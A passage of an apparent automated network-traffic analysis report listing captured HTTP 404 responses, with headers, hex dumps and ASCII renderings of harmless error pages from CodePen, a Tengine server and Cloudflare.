4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:52:11 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:52:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:52:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:52:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:52:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:52:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8BHT9S3dvMRDRP0XKhwslHqCuZuXOTpoOEysBa2xaZZJMtn65OZDAtg%2BFLtRW11%2BojrqEgZvAwVIT6Bpf%2BlxWxYZlOhjqNphRzTlWFZX7ALI6W9UzJxXXNy3tLE3KClNYQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec252950877c35d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102674&min_rtt=102674&rtt_var=51337&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:52:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnZkp4j1csISe%2BbxHsVWqaf0xXbZI9su%2BoLWamaycsfll6EsyQnD8w8Pykdn%2BdFsT73Dixa98YT9BlNaCH6knbbMp%2F6SrS%2Fcmbr6a9AW%2BiVlrJTRHSq6Qm7FdLCuOyzNQ08%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec252a59f9a4334-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102719&min_rtt=102719&rtt_var=51359&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=689&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i
